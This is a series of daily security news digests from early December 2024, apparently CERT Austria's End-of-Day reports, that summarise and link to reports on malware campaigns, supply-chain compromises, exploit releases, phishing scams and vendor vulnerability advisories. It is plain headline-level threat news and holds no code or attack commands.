https://cert-portal.siemens.com/productcert/html/ssa-730188.html
∗∗∗ SSA-701627 V1.0: XXE Injection Vulnerabilities in COMOS ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/html/ssa-701627.html
∗∗∗ SSA-645131 V1.0: Multiple WRL File Parsing Vulnerabilities in Teamcenter Visualization ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/html/ssa-645131.html
∗∗∗ SSA-620799 V1.0: Denial of Service Vulnerability During BLE Pairing in SENTRON Powercenter 1000/1100 ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/html/ssa-620799.html
∗∗∗ SSA-392859 V1.0: Local Arbitrary Code Execution Vulnerability in Siemens Engineering Platforms before V20 ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/html/ssa-392859.html
∗∗∗ SSA-384652 V1.0: Cross-Site Request Forgery (CSRF) Vulnerability in RUGGEDCOM ROX II ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/html/ssa-384652.html
∗∗∗ SSA-128393 V1.0: Firmware Decryption Vulnerability in SICAM A8000 CP-8031 and CP-8050 ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/html/ssa-128393.html
=====================
= End-of-Day report =
=====================
Timeframe: Friday 06-12-2024 18:00 − Monday 09-12-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Phish Supper: An Incident Responder’s Bread and Butter ∗∗∗
---------------------------------------------
This post will delve into a recent business email compromise engagement handled by NCC Group’s Digital Forensics and Incident Response (DFIR) team, which saw the compromise of 12 users’ Microsoft 365 accounts.
---------------------------------------------
https://www.nccgroup.com/us/research-blog/phish-supper-an-incident-responde…
∗∗∗ Hackers Using Fake Video Conferencing Apps to Steal Web3 Professionals' Data ∗∗∗
---------------------------------------------
"The threat actors behind the malware have set up fake companies using AI to make them increase legitimacy," Cado Security researcher Tara Gould said. "The company reaches out to targets to set up a video call, prompting the user to download the meeting application from the website, which is Realst infostealer."
---------------------------------------------
https://thehackernews.com/2024/12/hackers-using-fake-video-conferencing.html
∗∗∗ Abusing Git branch names to compromise a PyPI package ∗∗∗
---------------------------------------------
A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script. [..] This problem has been known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.
---------------------------------------------
https://lwn.net/Articles/1001215/
∗∗∗ A vulnerability in the OpenWrt attended sysupgrade server ∗∗∗
---------------------------------------------
The OpenWrt project has issued an advisory regarding a vulnerability found in its Attended Sysupgrade Server that could allow compromised packages to be installed on a router by an attacker. No official OpenWrt images were affected, and the vulnerability is not known to be exploited, but users who have installed images created with an instance of this server are recommended to reinstall.
---------------------------------------------
https://lwn.net/Articles/1001441/
∗∗∗ Secure Coding: CWE-1007 – the invisible danger of visually similar characters ∗∗∗
---------------------------------------------
Deliberate homoglyph attacks using visually similar characters can mislead users. Various best practices help to protect against them.
---------------------------------------------
https://heise.de/-10188217
∗∗∗ Malicious Maven Package Impersonating XZ for Java Library Introduces Backdoor Allowing Remote Code Execution ∗∗∗
---------------------------------------------
Socket researchers have discovered a malicious Maven package io.github.xz-java:xz-java that impersonates the legitimate XZ for Java library org.tukaani:xz. This deceptive package creates a hidden backdoor that enables remote command execution, posing a threat to enterprise supply chains.
---------------------------------------------
https://socket.dev/blog/malicious-maven-package-impersonating-xz-for-java-l…
∗∗∗ Exploit Code Released for Microsoft CVE-2024-38193 ∗∗∗
---------------------------------------------
A critical use-after-free vulnerability, tracked as CVE-2024-38193 with a CVSS score of 7.8, has been discovered in the afd.sys Windows driver that allows attackers to escalate privileges and execute arbitrary code. This vulnerability was fixed in the August 2024 Patch Tuesday release. [..] Security researcher Nephster has published proof-of-concept (PoC) code for the CVE-2024-38193 vulnerability on GitHub, further escalating its potential threat.
---------------------------------------------
https://thecyberthrone.in/2024/12/09/exploit-code-released-for-microsoft-cv…
=====================
= Vulnerabilities =
=====================
∗∗∗ Qlik: High Security fixes for Qlik Sense Enterprise for Windows (CVEs-pending) ∗∗∗
---------------------------------------------
Security issues in Qlik Sense Enterprise for Windows have been identified, and patches have been made available. If the vulnerabilities are successfully exploited, these issues could lead to a compromise of the server running the Qlik Sense software, including remote code execution (RCE).
---------------------------------------------
https://community.qlik.com/t5/Official-Support-Articles/High-Security-fixes…
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (redis:7, ruby, ruby:2.5, and ruby:3.1), Debian (avahi, ceph, chromium, gsl, jinja2, php7.4, renderdoc, ruby-doorkeeper, and zabbix), Fedora (chromium, python3.11, and uv), Gentoo (Asterisk, Cacti, Chromium, Google Chrome, Microsoft Edge, Opera, Dnsmasq, firefox, HashiCorp Consul, icinga2, OATH Toolkit, OpenJDK, PostgreSQL, R, Salt, Spidermonkey, and thunderbird), Mageia (kubernetes), Red Hat (grafana, grafana-pcp, osbuild-composer, and postgresql), SUSE (ansible-core, firefox, glib2, java-1_8_0-ibm, kernel-firmware, nanopb, netty, python310-django-ckeditor, python310-jupyter-ydoc, radare2, skopeo, and webkit2gtk3), and Ubuntu (tinyproxy).
---------------------------------------------
https://lwn.net/Articles/1001433/
∗∗∗ ZDI-24-1646: Epic Games Launcher Incorrect Default Permissions Local Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1646/
∗∗∗ F5: K000148896: Intel SGX vulnerability CVE-2023-43753 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000148896
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 05-12-2024 18:00 − Friday 06-12-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Trojan-as-a-Service Hits Euro Banks, Crypto Exchanges ∗∗∗
---------------------------------------------
At least 17 affiliate groups have used the "DroidBot" Android banking Trojan against 77 financial services companies across Europe, with more to come, researchers warn.
---------------------------------------------
https://www.darkreading.com/threat-intelligence/trojan-service-hits-euro-ba…
∗∗∗ Frequent freeloader part I: Secret Blizzard compromising Storm-0156 infrastructure for espionage ∗∗∗
---------------------------------------------
In this first of a two-part blog series, we discuss how Secret Blizzard has used the infrastructure of the Pakistan-based threat activity cluster we call Storm-0156 — which overlaps with the threat actor known as SideCopy, Transparent Tribe, and APT36 — to install backdoors and collect intelligence on targets of interest in South Asia.
---------------------------------------------
https://www.microsoft.com/en-us/security/blog/2024/12/04/frequent-freeloade…
∗∗∗ Malicious Script Injection on WordPress Sites ∗∗∗
---------------------------------------------
Recently, our team discovered a JavaScript-based malware affecting WordPress sites, primarily targeting those using the Hello Elementor theme. This type of malware is commonly embedded within legitimate-looking website files to load scripts from an external source. The malware injects a malicious external script into the theme’s header.php file, leading to harmful consequences for site owners and visitors.
---------------------------------------------
https://blog.sucuri.net/2024/12/malicious-script-injection-on-wordpress-sit…
∗∗∗ Hackers Leveraging Cloudflare Tunnels, DNS Fast-Flux to Hide GammaDrop Malware ∗∗∗
---------------------------------------------
The threat actor known as Gamaredon has been observed leveraging Cloudflare Tunnels as a tactic to conceal its staging infrastructure hosting a malware called GammaDrop. The activity is part of an ongoing spear-phishing campaign targeting Ukrainian entities since at least early 2024 that's designed to drop the Visual Basic Script malware, Recorded Future's Insikt Group said in a new analysis.
---------------------------------------------
https://thehackernews.com/2024/12/hackers-leveraging-cloudflare-tunnels.html
∗∗∗ Researchers Uncover Flaws in Popular Open-Source Machine Learning Frameworks ∗∗∗
---------------------------------------------
Cybersecurity researchers have disclosed multiple security flaws impacting open-source machine learning (ML) tools and frameworks such as MLflow, H2O, PyTorch, and MLeap that could pave the way for code execution. The vulnerabilities, discovered by JFrog, are part of a broader collection of 22 security shortcomings the supply chain security company first disclosed last month.
---------------------------------------------
https://thehackernews.com/2024/12/researchers-uncover-flaws-in-popular.html
∗∗∗ Announcing the launch of Vanir: Open-source Security Patch Validation ∗∗∗
---------------------------------------------
Today, we are announcing the availability of Vanir, a new open-source security patch validation tool. Introduced at Android Bootcamp in April, Vanir gives Android platform developers the power to quickly and efficiently scan their custom platform code for missing security patches and identify applicable available patches.
---------------------------------------------
http://security.googleblog.com/2024/12/announcing-launch-of-vanir-open-sour…
∗∗∗ Instant-access savings accounts: beware of fraudulent offers in CHECK24's name ∗∗∗
---------------------------------------------
In recent days, an increasing number of SMS messages have been sent advertising, in CHECK24's name, attractive instant-access savings accounts with interest rates of up to 5.25%. Anyone who wants to take up the offer is redirected to a deceptively genuine-looking phishing page. Money deposited there ends up in the accounts of criminals.
---------------------------------------------
https://www.watchlist-internet.at/news/tagesgeldkonten-betruegerischen-ange…
∗∗∗ Windows 11 24H2 available on more devices; TPM 2.0 mandatory; installation on unsupported CPUs ∗∗∗
---------------------------------------------
Microsoft has begun rolling out Windows 11 24H2 (called the Windows 11 2024 Update), which was generally released in October 2024, to more devices. Microsoft has also reaffirmed that TPM 2.0 is mandatory for Windows 11. On the other hand, some people are finding that Windows 11 24H2 can be installed on incompatible hardware without any tricks.
---------------------------------------------
https://www.borncity.com/blog/2024/12/06/windows-11-24h2-auf-mehr-geraeten-…
∗∗∗ Introducing Supply-Chain Firewall: Protecting Developers from Malicious Open Source Packages ∗∗∗
---------------------------------------------
Release of Supply-Chain Firewall, an open source tool for preventing the installation of malicious PyPI and npm packages.
---------------------------------------------
https://securitylabs.datadoghq.com/articles/introducing-supply-chain-firewa…
∗∗∗ New Malware Campaign Exposes Gaps in Manufacturing Cybersecurity Defenses ∗∗∗
---------------------------------------------
In a recent analysis by Cyble Research and Intelligence Labs (CRIL), a multi-stage cyberattack campaign has been identified, targeting the manufacturing industry. The attack, which heavily relies on process injection techniques, aims to deliver dangerous payloads, including Lumma Stealer and Amadey Bot.
---------------------------------------------
https://thecyberexpress.com/lumma-stealer-amadey-bot-target-manufacturing/
=====================
= Vulnerabilities =
=====================
∗∗∗ SonicWall SMA100 SSL-VPN Affected By Multiple Vulnerabilities ∗∗∗
---------------------------------------------
CVE: CVE-2024-38475, CVE-2024-40763, CVE-2024-45318, CVE-2024-45319, CVE-2024-53702, CVE-2024-53703
---------------------------------------------
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0018
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (firefox, postgresql, postgresql:12, postgresql:13, postgresql:15, postgresql:16, python3:3.6.8, and thunderbird), Debian (clamav), Fedora (pam), Red Hat (firefox, postgresql:13, postgresql:15, python-tornado, redis:7, ruby, ruby:2.5, and ruby:3.1), SUSE (avahi, docker-stable, java-1_8_0-openjdk, libmozjs-128-0, obs-scm-bridge, php8, and teleport), and Ubuntu (ghostscript, needrestart, and shiro).
---------------------------------------------
https://lwn.net/Articles/1001164/
∗∗∗ Windows: 0patch for 0-day URL File NTLM Hash Disclosure vulnerability ∗∗∗
---------------------------------------------
ACROS Security has discovered a vulnerability in Windows, not yet closed by an update, that allows the disclosure of NTLM hash values via a URL. ACROS Security has released a 0patch micropatch to remove this vulnerability. Until Microsoft provides an update, the 0patch micropatch is available free of charge.
---------------------------------------------
https://www.borncity.com/blog/2024/12/06/windows-0patch-fuer-0-day-url-file…
∗∗∗ Security update: Dell NetWorker backup software can leak data ∗∗∗
---------------------------------------------
Dell has released important security patches for its backup and recovery software NetWorker and the BSAFE SDK. However, not all updates are available yet.
---------------------------------------------
https://heise.de/-10190285
∗∗∗ QNAP: Vulnerability in Qsync Central ∗∗∗
---------------------------------------------
https://www.qnap.com/en-us/security-advisory/QSA-24-48
∗∗∗ QNAP: Multiple Vulnerabilities in QTS and QuTS hero (PWN2OWN 2024) ∗∗∗
---------------------------------------------
https://www.qnap.com/en-us/security-advisory/QSA-24-49
∗∗∗ QNAP: Vulnerability in License Center ∗∗∗
---------------------------------------------
https://www.qnap.com/en-us/security-advisory/QSA-24-50
∗∗∗ Tenable: [R1] Security Center Version 6.5.0 Fixes Multiple Vulnerabilities ∗∗∗
---------------------------------------------
https://www.tenable.com/security/tns-2024-19
=====================
= End-of-Day report =
=====================
Timeframe: Mittwoch 04-12-2024 18:00 − Donnerstag 05-12-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Health test cost trap: How to protect yourself from rip-offs ∗∗∗
---------------------------------------------
On gesundheitskontrolle.com or gesundheitsbewertung.com, two-minute health tests are promised. After answering a few questions, you supposedly receive a "tailor-made and individual health analysis" from health experts. We advise caution: a few days later, an invoice for 79 euros arrives in the mail.
---------------------------------------------
https://www.watchlist-internet.at/news/kostenfalle-gesundheitstest/
∗∗∗ MOONSHINE Exploit Kit and DarkNimbus Backdoor Enabling Earth Minotaur’s Multi-Platform Attacks ∗∗∗
---------------------------------------------
Trend Micro’s monitoring of the MOONSHINE exploit kit revealed how it’s used by the threat actor Earth Minotaur to exploit Android messaging app vulnerabilities and install the DarkNimbus backdoor for surveillance.
---------------------------------------------
https://www.trendmicro.com/en_us/research/24/l/earth-minotaur.html
∗∗∗ Telecom Giant BT Group Hit by Black Basta Ransomware ∗∗∗
---------------------------------------------
BT Group, a major telecommunications firm, has been hit by a ransomware attack from the Black Basta group. The attack targeted the company's Conferencing division, leading to server shutdowns and potential data theft.
---------------------------------------------
https://hackread.com/telecom-giant-bt-group-black-basta-ransomware-attack/
∗∗∗ Beware of WhatsApp phishing with spoofed phone number ∗∗∗
---------------------------------------------
Cyber criminals are targeting German-speaking WhatsApp users and are attempting to hijack their accounts with a perfidious trick and a chatbot.
---------------------------------------------
https://heise.de/-10188150
∗∗∗ USA: Eight telecommunications providers affected by cyberattacks ∗∗∗
---------------------------------------------
It was already known during the election campaign that criminals had obtained the phone data of high-ranking US politicians. But the attack was more extensive than thought.
---------------------------------------------
https://heise.de/-10188807
∗∗∗ [Guest Diary] Business Email Compromise, (Thu, Dec 5th) ∗∗∗
---------------------------------------------
Business Email Compromise (BEC) is a lucrative attack, for which FBI data shows 51 billion dollars in losses between 2013 and 2022 [2]. According to SentinelOne, nearly all cybersecurity attacks (98%) contain a social engineering component [3]. The social engineering attacks include phishing, spear phishing, smishing, whaling, etc.
---------------------------------------------
https://isc.sans.edu/diary/rss/31474
=====================
= Vulnerabilities =
=====================
∗∗∗ Critical Mitel MiCollab Flaw Exposes Systems to Unauthorized File and Admin Access ∗∗∗
---------------------------------------------
Cybersecurity researchers have released a proof-of-concept (PoC) exploit that strings together a now-patched critical security flaw impacting Mitel MiCollab with an arbitrary file read zero-day, granting an attacker the ability to access files from susceptible instances. [..] WatchTowr Labs' analysis further found that the authentication bypass could be chained with an as-yet-unpatched post-authentication arbitrary file read flaw to extract sensitive information.
---------------------------------------------
https://thehackernews.com/2024/12/critical-mitel-micollab-flaw-exposes.html
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Fedora (thunderbird, tuned, and webkitgtk), Mageia (python-aiohttp and qemu), Oracle (container-tools:ol8, firefox, java-1.8.0-openjdk, java-11-openjdk, kernel, kernel:4.18.0, krb5, pam, postgresql:16, python-tornado, python3:3.6.8, thunderbird, tigervnc, tuned, and webkit2gtk3), Red Hat (bzip2, postgresql, postgresql:13, postgresql:15, postgresql:16, python-tornado, and ruby:3.1), Slackware (python3), SUSE (postgresql, postgresql16, postgresql17, postgresql13, postgresql14, postgresql15, python-python-multipart, and python3), and Ubuntu (python-django and recutils).
---------------------------------------------
https://lwn.net/Articles/1000870/
∗∗∗ Four vulnerabilities closed in HPE Aruba Networking ClearPass Policy Manager ∗∗∗
---------------------------------------------
In current versions of HPE Aruba Networking ClearPass Policy Manager, the developers have closed a total of four security vulnerabilities. In the worst case, attackers can execute their own code and compromise systems.
---------------------------------------------
https://heise.de/-10188868
∗∗∗ Drupal: Entity Form Steps - Moderately critical - Cross site scripting - SA-CONTRIB-2024-071 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-071
∗∗∗ Drupal: Minify JS - Moderately critical - Cross site request forgery - SA-CONTRIB-2024-070 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-070
∗∗∗ Drupal: Download All Files - Critical - Access bypass - SA-CONTRIB-2024-069 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-069
∗∗∗ Drupal: Pages Restriction Access - Critical - Access bypass - SA-CONTRIB-2024-068 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-068
∗∗∗ Drupal: OAuth & OpenID Connect Single Sign On – SSO (OAuth/OIDC Client) - Critical - Cross Site Scripting - SA-CONTRIB-2024-067 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-067
∗∗∗ Drupal: Print Anything - Critical - Unsupported - SA-CONTRIB-2024-066 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-066
∗∗∗ Drupal: Megamenu Framework - Critical - Unsupported - SA-CONTRIB-2024-065 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-065
∗∗∗ Wordfence Intelligence Weekly WordPress Vulnerability Report (November 25, 2024 to December 1, 2024) ∗∗∗
---------------------------------------------
https://www.wordfence.com/blog/2024/12/wordfence-intelligence-weekly-wordpr…
∗∗∗ AutomationDirect C-More EA9 Programming Software ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-340-01
∗∗∗ Planet Technology Planet WGS-804HPT ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-340-02
=====================
= End-of-Day report =
=====================
Timeframe: Dienstag 03-12-2024 18:00 − Mittwoch 04-12-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Supply Chain Attack Detected in Solana's web3.js Library ∗∗∗
---------------------------------------------
A supply chain attack has been detected in versions 1.95.6 and 1.95.7 of the popular @solana/web3.js library, which receives more than ~350,000 weekly downloads on npm. These compromised versions contain injected malicious code that is designed to steal private keys from unsuspecting developers and users, potentially enabling attackers to drain cryptocurrency wallets. [..] npm has moved swiftly to remove the affected versions. [..] Anza recommends developers who suspect they were compromised to rotate any suspect authority keys, including multisigs, program authorities, and server keypairs.
---------------------------------------------
https://socket.dev/blog/supply-chain-attack-solana-web3-js-library
∗∗∗ Patch now! Exploit for critical vulnerability in WhatsUp Gold in circulation ∗∗∗
---------------------------------------------
A "critical" security vulnerability has been known since September of this year. A security update has been available since then. Because exploit code for the vulnerability is now circulating, attacks could be imminent.
---------------------------------------------
https://heise.de/-10187538
∗∗∗ Cisco Urges Immediate Patch for Decade-Old WebVPN Vulnerability ∗∗∗
---------------------------------------------
Cisco recently updated an advisory about a security flaw in the WebVPN login page of their ASA software, which can allow an unauthenticated, remote attacker to execute a cross-site scripting (XSS) attack on anyone using WebVPN on the Cisco ASA. [..] The vulnerability itself isn’t new – Cisco originally issued a warning back in March 2014. However, the company’s recent update highlights a concerning development: attackers are actively trying to exploit this decade-old bug.
---------------------------------------------
https://hackread.com/cisco-patch-decade-old-webvpn-vulnerability/
∗∗∗ (QR) Coding My Way Out of Here: C2 in Browser Isolation Environments ∗∗∗
---------------------------------------------
In this blog post, Mandiant demonstrates a novel technique that can be used to circumvent all three current types of browser isolation (remote, on-premises, and local) for the purpose of controlling a malicious implant via C2. Mandiant shows how attackers can use machine-readable QR codes to send commands from an attacker-controlled server to a victim device.
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/c2-browser-isolati…
∗∗∗ Due to serious cyberattack on US providers: FBI promotes encryption ∗∗∗
---------------------------------------------
In light of a devastating cyberattack on US providers, the US federal police FBI and the cybersecurity agency CISA have urged people in the United States to encrypt their communications wherever possible.
---------------------------------------------
https://heise.de/-10187110
∗∗∗ Black Basta Ransomware Campaign Drops Zbot, DarkGate, and Custom Malware ∗∗∗
---------------------------------------------
Beginning in early October, Rapid7 has observed a resurgence of activity related to the ongoing social engineering campaign being conducted by Black Basta ransomware operators.
---------------------------------------------
https://www.rapid7.com/blog/post/2024/12/04/black-basta-ransomware-campaign…
∗∗∗ PROXY.AM Powered by Socks5Systemz Botnet ∗∗∗
---------------------------------------------
After a year long investigation, Bitsight TRACE follows up on Socks5Systemz research.
---------------------------------------------
https://www.bitsight.com/blog/proxyam-powered-socks5systemz-botnet
∗∗∗ New era of slop security reports for open source ∗∗∗
---------------------------------------------
Recently I've noticed an uptick in extremely low-quality, spammy, and LLM-hallucinated security reports to open source projects. [..] Security reports that waste maintainers' time result in confusion, stress, frustration, and to top it off a sense of isolation due to the secretive nature of security reports. [..] If this is happening to a handful of projects that I have visibility for, then I suspect that this is happening on a large scale to open source projects. This is a very concerning trend.
---------------------------------------------
https://sethmlarson.dev/slop-security-reports
=====================
= Vulnerabilities =
=====================
∗∗∗ Identity management: Maximum-severity vulnerability threatens IdentityIQ ∗∗∗
---------------------------------------------
So far there is no warning from SailPoint about the vulnerability. All information about the "critical" vulnerability (CVE-2024-10905) is currently based on an entry in the National Vulnerability Database (NVD) of the National Institute of Standards and Technology (NIST). [..] The vulnerability is said to be closed in releases 8.2p8, 8.3p5 and 8.4p2.
---------------------------------------------
https://heise.de/-10187194
∗∗∗ Cisco NX-OS Software Image Verification Bypass Vulnerability ∗∗∗
---------------------------------------------
A vulnerability in the bootloader of Cisco NX-OS Software could allow an unauthenticated attacker with physical access to an affected device, or an authenticated, local attacker with administrative credentials, to bypass NX-OS image signature verification. CVE-2024-20397
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Red Hat (go-toolset:rhel8, grafana, kernel, kernel-rt, kernel:4.18.0, pam, pam:1.5.1, pcs, postgresql:12, postgresql:15, postgresql:16, python3:3.6.8, qemu-kvm, rhc, rhc-worker-playbook, and virt:rhel and virt-devel:rhel) and SUSE (ansible-10, ansible-core, avahi, bpftool, python, python3, python36, webkit2gtk3, and xen).
---------------------------------------------
https://lwn.net/Articles/1000721/
∗∗∗ Scan2Net: Multiple critical vulnerabilities in Image Access Scan2Net ∗∗∗
---------------------------------------------
https://sec-consult.com/de/vulnerability-lab/advisory/mehrere-kritische-sch…
∗∗∗ PGST: Multiple vulnerabilities in PGST alarm systems (SYSS-2024-070 to -073) ∗∗∗
---------------------------------------------
https://www.syss.de/pentest-blog/mehrere-schwachstellen-in-pgst-alarmanlage…
∗∗∗ F5: K000148830: Linux kernel vulnerabilities CVE-2024-41090 and CVE-2024-41091 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000148830
=====================
= End-of-Day report =
=====================
Timeframe: Montag 02-12-2024 18:00 − Dienstag 03-12-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Building Cyber Resilience Against Ransomware Attacks ∗∗∗
---------------------------------------------
This is the first blogpost in this series. Its aim is twofold: to enable organizations embarking on a journey to build resilience against ransomware to recognize common misconceptions hindering readiness efforts and offer a conceptual framework to guide effective resilience building.
---------------------------------------------
https://blog.nviso.eu/2024/12/03/building-cyber-resilience-against-ransomwa…
∗∗∗ Unveiling RevC2 and Venom Loader ∗∗∗
---------------------------------------------
Venom Spider, also known as GOLDEN CHICKENS, is a threat actor known for offering Malware-as-a-Service (MaaS) tools like VenomLNK, TerraLoader, TerraStealer, and TerraCryptor. These tools have been utilized by other threat groups such as FIN6 and Cobalt in the past. Recently, Zscaler ThreatLabz uncovered two significant campaigns leveraging Venom Spider's MaaS tools between August and October 2024. During our investigation, we identified two new malware families, which we named RevC2 and Venom Loader, that were deployed using Venom Spider MaaS Tools.
---------------------------------------------
https://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-l…
∗∗∗ Gafgyt Malware Targeting Docker Remote API Servers ∗∗∗
---------------------------------------------
Our researchers identified threat actors exploiting misconfigured Docker servers to spread the Gafgyt malware. This threat traditionally targets IoT devices; this new tactic signals a change in its behavior.
---------------------------------------------
https://www.trendmicro.com/en_us/research/24/l/gafgyt-malware-targeting-doc…
∗∗∗ Secure Coding: Secure error handling in Java – avoiding CWE-778 risks ∗∗∗
---------------------------------------------
Improve control over error reports with secure Java design patterns such as the Decorator and Proxy pattern – to protect against CWE-778 vulnerabilities.
---------------------------------------------
https://heise.de/-10084007
∗∗∗ On Almost Signing Android Builds ∗∗∗
---------------------------------------------
This blog post has two goals: to raise awareness about this issue, and to introduce a script intended as a quick check to verify if an Android build was (incorrectly) signed with a known private key. When Android-based devices boot up, first the bootloader is verified to be running signed code, then the bootloader verifies the high-level operating system (HLOS). This blog post only covers the latter part.
---------------------------------------------
https://www.nccgroup.com/us/research-blog/on-almost-signing-android-builds/
∗∗∗ Extracting Files Embedded Inside Word Documents, (Tue, Dec 3rd) ∗∗∗
---------------------------------------------
I found a sample that is a Word document with an embedded executable. I'll explain how to extract the embedded executable with my tools.
---------------------------------------------
https://isc.sans.edu/diary/rss/31486
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (container-tools:rhel8, kernel, kernel-rt:4.18.0, kernel:4.18.0, pam, pam:1.5.1, perl-App-cpanminus, perl-App-cpanminus:1.7044, python-tornado, tigervnc, tuned, and webkit2gtk3), Debian (needrestart and webkit2gtk), Mageia (firefox, glib2.0, krb5, and thunderbird), Red Hat (firefox, postgresql, postgresql:12, postgresql:13, postgresql:15, postgresql:16, and thunderbird), SUSE (editorconfig-core-c, kernel, php7, php8, python, python-tornado6, python3-virtualenv, python310, python39, thunderbird, wget, and wireshark), and Ubuntu (firefox and haproxy).
---------------------------------------------
https://lwn.net/Articles/1000591/
∗∗∗ Zyxel security advisory for buffer overflow and post-authentication command injection vulnerabilities in some 4G LTE/5G NR CPE, DSL/Ethernet CPE, fiber ONTs, and WiFi extenders ∗∗∗
---------------------------------------------
CVE-2024-8748 ... could allow an attacker to cause denial of service (DoS) conditions against the web management interface [..] CVE-2024-9197 ... could allow an authenticated attacker with administrator privileges to cause DoS conditions against the web management interface [..] CVE-2024-9200 ... could allow an authenticated attacker with administrator privileges to execute operating system (OS) commands on a vulnerable device.
---------------------------------------------
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-…
∗∗∗ Patchday: Android 12, 13, 14 and 15 vulnerable to malicious code attacks ∗∗∗
---------------------------------------------
In an advisory, Google highlights a security vulnerability (CVE-2024-43767, "high") in the System component as particularly threatening: attackers can execute malicious code. No additional execution privileges are said to be required. How exactly such an attack could proceed remains unclear, however.
---------------------------------------------
https://heise.de/-10185926
∗∗∗ HPE: HPESBGN04760 rev.1 - HPE AutoPass License Server (APLS), Multiple Vulnerabilities ∗∗∗
---------------------------------------------
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04760en_us&doc…
∗∗∗ Fuji Electric Monitouch V-SFT ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-338-05
∗∗∗ Fuji Electric Tellus Lite V-Simulator ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-338-06
∗∗∗ ICONICS and Mitsubishi Electric GENESIS64 Products ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-338-04
∗∗∗ Open Automation Software ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-338-03
∗∗∗ Ruijie Reyee OS ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-338-01
∗∗∗ F5: K000148809: Qt vulnerabilities CVE-2023-38197, CVE-2023-37369, and CVE-2023-32763 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000148809
∗∗∗ F5: K000148689: Qt vulnerability CVE-2023-32762 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000148689
∗∗∗ Veeam: Veeam Service Provider Console Vulnerability (CVE-2024-42448 | CVE-2024-42449) ∗∗∗
---------------------------------------------
https://www.veeam.com/kb4679
∗∗∗ Veeam: Vulnerabilities Resolved in Veeam Backup & Replication 12.3 ∗∗∗
---------------------------------------------
https://www.veeam.com/kb4693
∗∗∗ ZDI-24-1640: XnSoft XnView Classic RWZ File Parsing Integer Underflow Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1640/
=====================
= End-of-Day report =
=====================
Timeframe: Freitag 29-11-2024 18:00 − Montag 02-12-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Phishing: Attackers bypass virus scanning using corrupted Word documents ∗∗∗
---------------------------------------------
Security researchers have come across a new method by which cyber criminals slip crafted documents past virus protection.
---------------------------------------------
https://www.heise.de/-10184679
∗∗∗ "Juice jacking": How dangerous is charging your smartphone in public? ∗∗∗
---------------------------------------------
Authorities repeatedly warn of attacks via manipulated chargers, but Cert Austria sees this as a predominantly theoretical threat.
---------------------------------------------
https://www.derstandard.at/story/3000000246594/juice-jacking-wie-gefaehrlic…
∗∗∗ Helldown, DoxNet & Darkrace Ransomware ∗∗∗
---------------------------------------------
In the following article I list some unique detection opportunities for all three ransomware groups, which seem to have the same affiliates or use the same server with similar ransomware variants to deploy their malware.
---------------------------------------------
https://detect.fyi/helldown-donex-darktrace-ransomware-fd8683b7d135?source=…
∗∗∗ Code found online exploits LogoFAIL to install Bootkitty Linux backdoor ∗∗∗
---------------------------------------------
Researchers have discovered malicious code circulating in the wild that hijacks the earliest stage boot process of Linux devices by exploiting a year-old firmware vulnerability when it remains unpatched on affected models. [..] The ultimate objective of the exploit, which Binarly disclosed Friday, is to install Bootkitty, a bootkit for Linux that was found and reported on Wednesday by researchers from security firm ESET.
---------------------------------------------
